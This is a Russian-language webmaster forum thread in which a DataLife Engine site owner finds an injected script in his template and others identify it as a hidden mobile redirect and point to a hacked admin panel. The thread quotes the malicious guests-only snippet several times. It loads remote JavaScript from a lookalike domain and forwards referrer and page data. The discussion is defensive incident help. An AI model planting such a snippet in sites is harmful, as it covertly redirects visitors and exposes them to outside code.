Левый скрипт на сайте

Ivan

Новичок
Регистрация
5 Мар 2017
Сообщения
88
Реакции
15
Баллы
8
Здраствуйте!
появился на моєм сайте в фйле main вот такой скрипт:

[group=5]<script type="application/javascript">
document.write('<script type="application/javascript" src="//jquery.dle-news.su/Fpnp6f?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'"><' + '/script>');
</script>[/group]


возможно ктото с ним уже сталкивался,что он делает?
Заранее спасибо!

P/S
само собой что вот этот чудо скрипт удалил, просто интересно что он делает...
 

Анна

Модератор
Команда форума
Приватовец
VIP
Прошёл марафон
Регистрация
23 Апр 2017
Сообщения
1.377
Реакции
540
Баллы
113
Здраствуйте!
появился на моєм сайте в фйле main вот такой скрипт:

[group=5]<script type="application/javascript">
document.write('<script type="application/javascript" src="//jquery.dle-news.su/Fpnp6f?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'"><' + '/script>');
</script>[/group]


возможно ктото с ним уже сталкивался,что он делает?
Заранее спасибо!

P/S
само собой что вот этот чудо скрипт удалил, просто интересно что он делает...
Скорей всего от этого скрипта работает что-то в шаблоне. Для незарегистрированных пользователей. Выйдите из админки и посмотрите что изменилось в шаблоне.
 
  • Like
Реакции: Ivan

Ivan

Новичок
Регистрация
5 Мар 2017
Сообщения
88
Реакции
15
Баллы
8
Скорей всего от этого скрипта работает что-то в шаблоне. Для незарегистрированных пользователей. Выйдите из админки и посмотрите что изменилось в шаблоне.
проблема в том что AI-Bolit ругает этот скрипт а раньше такого не было + в шаблоне никакой разницы не вижу (кэш чистил)
 

Анна

Модератор
Команда форума
Приватовец
VIP
Прошёл марафон
Регистрация
23 Апр 2017
Сообщения
1.377
Реакции
540
Баллы
113
проблема в том что AI-Bolit ругает этот скрипт а раньше такого не было + в шаблоне никакой разницы не вижу (кэш чистил)
Просто если скрипт, то может влиять на какую то форму, слайдер и подобные штуки. Так что аккуратней. Надо смотреть, что у вас в шаблоне есть для незарегистрированных пользователей.
 
  • Like
Реакции: Ivan

Ivan

Новичок
Регистрация
5 Мар 2017
Сообщения
88
Реакции
15
Баллы
8
Просто если скрипт, то может влиять на какую то форму, слайдер и подобные штуки. Так что аккуратней. Надо смотреть, что у вас в шаблоне есть для незарегистрированных пользователей.
Понятно, то есть этот скрипт не является вредоносним
Спасибо за помощь =)
 

sobakatochkaru

Новичок
Регистрация
1 Апр 2017
Сообщения
51
Реакции
21
Баллы
8
Мда, удалили - супер! Ищете теперь дыру через которую вам это вставили в шаб. Эта кака - мобильный редирект. Что интересно теперь его домен маскируется под офсайт dle-news прописали видимо ip-шки их) Уже попадался на некоторых сайтах мне, ищите шелы у себя.
 
  • Like
Реакции: Ivan

sobakatochkaru

Новичок
Регистрация
1 Апр 2017
Сообщения
51
Реакции
21
Баллы
8
Понятно, то есть этот скрипт не является вредоносним
Спасибо за помощь =)
С головой всё в порядке? Вы же сами писали - появился сам, в тегах - только для гостей, т.е. зареганный и тем более админ ничего не заметит, верни эту строку обратно и зайди с мобильного инета на сайт свой и разлогинись - думаю офигеешь, хотя хрен его знает может и рандомно срабатывать будет. Но фильтр от ПС этот скрипт тебе гарантирует)
 
  • Like
Реакции: Ivan

Анна

Модератор
Команда форума
Приватовец
VIP
Прошёл марафон
Регистрация
23 Апр 2017
Сообщения
1.377
Реакции
540
Баллы
113
Понятно, то есть этот скрипт не является вредоносним
Спасибо за помощь =)
Я не утверждаю, что он не вредосный. А просто предполагаю, что может быть скрипт от шаблона. Но выше вам уже ответили.
 
  • Like
Реакции: Ivan

Ivan

Новичок
Регистрация
5 Мар 2017
Сообщения
88
Реакции
15
Баллы
8
С головой всё в порядке? Вы же сами писали - появился сам, в тегах - только для гостей, т.е. зареганный и тем более админ ничего не заметит, верни эту строку обратно и зайди с мобильного инета на сайт свой и разлогинись - думаю офигеешь, хотя хрен его знает может и рандомно срабатывать будет. Но фильтр от ПС этот скрипт тебе гарантирует)
Спасибо за помощь
Дело в том что сегодня тяжелый день, и голова плохо варит ..
 

MexaHu3aToP

Новичок
Прошёл марафон
Регистрация
24 Фев 2017
Сообщения
277
Реакции
128
Баллы
43
Вас не смущает dle-news.su? Скорей всего Брут, админка по стандартному адресу? example.ru/admin.php?
 
  • Like
Реакции: Ivan

sobakatochkaru

Новичок
Регистрация
1 Апр 2017
Сообщения
51
Реакции
21
Баллы
8
Скорей всего Брут, админка по стандартному адресу? example.ru/admin.php?
Навряд ли, скорее всего Баг Фиксы » DataLife Engine (DLE) — система управления сайтом и контентом. Официальный сайт. не исправлены, как вариант установлены бесплатные паблик модули, те же подборки, тот же catmeta и т.д. А в админке - ну проверьте авторизовывался ли кто то не с вашего ip - ссылка-новый-адрес-админки.php?mod=logs ну думаю только свой найдёте) или своей подсети если динамический.
 

MakcoN

Приватовец
Приватовец
VIP
Прошёл марафон
Регистрация
28 Мар 2017
Сообщения
285
Реакции
167
Баллы
43
@Ivan, В каком файле нашел?
 

Ivan

Новичок
Регистрация
5 Мар 2017
Сообщения
88
Реакции
15
Баллы
8
Навряд ли, скорее всего Баг Фиксы » DataLife Engine (DLE) — система управления сайтом и контентом. Официальный сайт. не исправлены, как вариант установлены бесплатные паблик модули, те же подборки, тот же catmeta и т.д. А в админке - ну проверьте авторизовывался ли кто то не с вашего ip - ссылка-новый-адрес-админки.php?mod=logs ну думаю только свой найдёте) или своей подсети если динамический.
Админку взломали, я нашел там левый айпи, но пройтись по дирам всеравно нужно, мало ли что может выползти =):agree:
 

MexaHu3aToP

Новичок
Прошёл марафон
Регистрация
24 Фев 2017
Сообщения
277
Реакции
128
Баллы
43
Админку взломали, я нашел там левый айпи, но пройтись по дирам всеравно нужно, мало ли что может выползти =):agree:
Если бы был доступ к файлам движка, я бы на его месте не ставил js код в шаблон. Можешь время не терять, с движком все нормально.
 
  • Like
Реакции: Ivan
Сверху Снизу